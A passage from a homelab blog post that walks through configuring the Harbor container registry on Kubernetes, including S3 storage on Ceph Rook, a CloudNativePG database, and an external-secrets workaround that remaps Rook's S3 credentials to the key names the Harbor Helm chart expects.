</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">registry</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">registry</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">controller</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">credentials</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">my-harbor-registry-user</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">my-harbor-registry-user-secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">trivy</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">database</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">external</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">external</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;harbor-pg-cluster-rw&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">coreDatabase</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">harbor-pg-cluster-app</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">external</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">external</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">addr</span>: <span style="color:#ae81ff">redis.redis.svc.cluster.local:6379</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>The above is only for completeness&rsquo; sake. Let&rsquo;s go through the config bit-by-bit.
The first part is the setup for external access:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">expose</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certSource</span>: <span style="color:#ae81ff">none</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">core</span>: <span style="color:#ae81ff">harbor.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">myentrypoint</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">harbor</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">externalURL</span>: <span style="color:#ae81ff">https://harbor.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ipFamily</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ipv6</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>This uses my <a href="https://blog.mei-home.net/posts/k8s-migration-3-traefik-ingress/">Traefik Ingress</a>
to provide external connectivity. I&rsquo;m disabling IPv6 because I don&rsquo;t have it
set up in my Homelab. Please note the (perfectly normal!) spelling of <code>externalURL</code>.
I spelled it wrong, and so all the pull commands which Harbor helpfully shows
in the web UI had the default URL in it. One of those things which can really
only be solved by staring very intently at the YAML for an extended period of
time. &#x1f605;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageChartStorage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">disableredirect</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">my-harbor-rgw-secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">bucket</span>: <span style="color:#ae81ff">harbor-random-numbers-here</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regionendpoint</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-myobjectstorename.my-rook-cluster-namespace.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">v4auth</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">rootdirectory</span>: <span style="color:#ae81ff">/harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">encrypt</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secure</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>Next up is persistence. Harbor has two approaches here. The first one, which is
the default that I&rsquo;m not using here, is using PersistentVolumeClaims to store
the data, like container images. The second one is using S3, as I&rsquo;m doing here.
I disable the registry&rsquo;s redirect feature here. It would normally redirect any
requests directly to the S3 storage. But access to my S3 storage is very limited
outside the cluster. And with my relatively low levels of activity, I don&rsquo;t need
to reduce the load on Harbor&rsquo;s registry by enabling it.
I&rsquo;m using my <a href="https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/">Ceph Rook based S3 setup</a>
here. Again for completeness&rsquo; sake, here is the manifest for creating the bucket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">objectbucket.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ObjectBucketClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">generateBucketName</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span></code></pre></div><p>I will talk about the secrets setup later in a separate section.</p>
<p>Another important thing to configure when setting up storage without persistent
volumes is the configuration of storage for the job logs from e.g. the automated
security scans Harbor can conduct on the images:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">jobservice</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jobLoggers</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">database</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span></code></pre></div><p>The important part here is the <code>jobservice.jobLoggers[0]=database</code> setting,
which configures the job service to write logs to the Postgres DB.</p>
<p>I&rsquo;m also disabling all of this security scanning, by switching off <code>trivy.enabled</code>.</p>
<p>Next somewhat interesting thing is the database setup:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">database</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">external</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">external</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;harbor-pg-cluster-rw&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">coreDatabase</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">harbor-pg-cluster-app</span>
</span></span></code></pre></div><p>To manage the database, I&rsquo;m using <a href="http://localhost:1313/posts/k8s-migration-8-cloud-native-pg/">my CloudNativePG setup</a>.
Here are some parts of the database config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;200&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;50MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;150MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;12800kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;1536kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;128kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_keep_size</span>: <span style="color:#e6db74">&#34;512MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1.</span><span style="color:#ae81ff">5G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span></code></pre></div><p>I hope this is a good compromise between dumping a long piece of YAML into
every post about an app which needs Postgres, and not showing the database
setup at all.</p>
<p>Finally, I&rsquo;m using my Redis instance for caching and disabling metrics
explicitly, so when I get around to gathering all the app level metrics and
making dashboards, I&rsquo;ve got something to grep for in the Homelab repo. &#x1f609;</p>
<h3 id="issues-with-secrets">Issues with secrets</h3>
<p>I had a couple of issues with the different secrets which Harbor needs.
First, let&rsquo;s start with the place where it&rsquo;s doing it right, the admin
credentials:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">existingSecretAdminPassword</span>: <span style="color:#ae81ff">my-admin-secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">existingSecretAdminPasswordKey</span>: <span style="color:#ae81ff">mySecretsKey</span>
</span></span></code></pre></div><p>The Helm chart doesn&rsquo;t just allow setting the Secret to use, but also which key
in that Secret contains the password. That&rsquo;s how it should be done.</p>
<p>The credentials for the database were also okay, because the key the Helm chart
expected, <code>password</code>, happens to also be the key where CloudNativePG stores
the user password in the secret it creates with the credentials. What saddened
me a bit is that I couldn&rsquo;t set the host and port that way as well, because
CNPG puts those into the keys of the Secret it creates as well.</p>
<p>But a lot more annoying were the S3 credentials. Rook creates a secret for
every bucket, complete with the access key and the secret key, as well as the
name of the bucket, which is created semi-randomly. It also provides the correct
endpoint. It would have been nice if I could have handed the ConfigMap Rook
creates over to the Helm chart. Instead, I hardcoded the values in the <code>values.yaml</code>,
which means I would have to do some manual intervention if I ever have to recreate
it all.
For the credentials, I could at least provide the name of an existing Secret.
But as per the <code>values.yaml</code> comments, the access key and the secret key need
to be put into specific keys in the provided Secret. And those were not the
standard key names you would expect, e.g. <code>AccessKey</code> and <code>SecretKey</code>.
No, they have to be <code>REGISTRY_STORAGE_S3_ACCESSKEY</code> and <code>REGISTRY_STORAGE_S3_SECRETKEY</code>.</p>
<p>So what to do now? Manually extract the keys from Rook&rsquo;s secret and write a new
secret by hand? Luckily, no. The Fediverse came through, and somebody proposed
to use external-secret&rsquo;s <a href="https://external-secrets.io/latest/provider/kubernetes/">Kubernetes provider</a>.
This provider allows me to automatically take a Kubernetes Secret, and create
a new secret from it, with the same data in different keys. This is still a pretty
roundabout way, but I decided that this is preferable to the other options,
which would be writing a secret by hand or forking the Helm chart.</p>
<p>First, we need to define some RBAC objects for use by the SecretStore for the
Kubernetes provider.</p>
<p>Here is the ServiceAccount:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span></code></pre></div><p>Next, we need a Role for that ServiceAccount to use:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor-role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">secrets</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">selfsubjectrulesreviews</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">create</span>
</span></span></code></pre></div><p>This allows all accounts using the Role to view Secrets in the Namespace the
Role is created in, which in this case is my Harbor Namespace.</p>
<p>Finally, we need a RoleBinding to bind the Role to the ServiceAccount:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">RoleBinding</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">roleRef</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apiGroup</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">subjects</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span></code></pre></div><p>Once all of that has been created, we can define the SecretStore:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-secrets-store</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteNamespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">serviceAccount</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-root-ca.crt</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ca.crt</span>
</span></span></code></pre></div><p>One fascinating thing I learned is that Kubernetes puts the CA certs for the
kube-apiserver in every Namespace, under a ConfigMap called <code>kube-root-ca.crt</code>.</p>
<p>This SecretStore can then be used to take the Secret created by Rook for the
S3 bucket and rewrite it to fit the expectations of the Harbor chart as follows:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;harbor-s3-secret&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-secrets-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">REGISTRY_STORAGE_S3_ACCESSKEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">REGISTRY_STORAGE_S3_SECRETKEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span></code></pre></div><p>This will have external-secrets go to the kube-apiserver and get the
<code>AWS_SECRET_ACCESS_KEY</code> and <code>AWS_ACCESS_KEY_ID</code> keys from the <code>harbor</code> Secret,
which was previously created automatically by Rook through the <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">ObjectBucketClaim</a>
I used to create the S3 bucket for Harbor.</p>
<p>And with these five simple manifests, I could use the Rook S3 Secret with the
Harbor Helm chart. &#x1f605;</p>
<p>One last thing which tripped me during setup were the registry credentials.
The <a href="https://github.com/goharbor/harbor-helm/blob/main/values.yaml">values.yaml</a>
contains these comments on how to set up the credentials:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">registry</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">credentials</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#e6db74">&#34;harbor_registry_user&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;harbor_registry_password&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># If using existingSecret, the key must be REGISTRY_PASSWD and REGISTRY_HTPASSWD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Login and password in htpasswd string format. Excludes `registry.credentials.username`  and `registry.credentials.password`. May come in handy when integrating with tools like argocd or flux. This allows the same line to be generated each time the template is rendered, instead of the `htpasswd` function from helm, which generates different lines each time because of the salt.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># htpasswdString: $apr1$XLefHzeG$Xl4.s00sMSCCcMyJljSZb0 # example string</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">htpasswdString</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>What I did not initially get from that comment was that when using an existing
Secret, both the clear text password and the htpasswd string are required.
This initially put me into an amusing conundrum: I did not have a single host
where I had <code>htpasswd</code> available. &#x1f602;
I ended up using the Apache container just to generate the htpasswd string:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>docker run -it httpd htpasswd -n -B my-harbor-registry-user
</span></span></code></pre></div><p>I then put that string into the Secret verbatim and was finally able to start
the Harbor instance.</p>
<h2 id="transferring-my-internal-images-to-harbor">Transferring my internal images to Harbor</h2>
<p>The first step I took was to transfer all of my internal images over to Harbor,
by adapting the CI jobs which create them and pointing them to Harbor.</p>
<p>I&rsquo;ve currently got five internal images, most of them just copies of official
images with some additions. I create them with <a href="https://www.drone.io/">Drone CI</a>,
which I will switch over to <a href="https://woodpecker-ci.org/">Woodpecker</a> later as
part of the migration.</p>
<p>The first step in transferring the images was to set up a user for the CI in
Harbor. This can be done with the Harbor Terraform provider, but I did it
manually for now. Then I created a &ldquo;homelab&rdquo; project for those Docker images.</p>
<p>For my image repository, which houses the Dockerfiles for most of my internal
images, I have a <code>.drone.jsonnet</code> file which looks like this:</p>
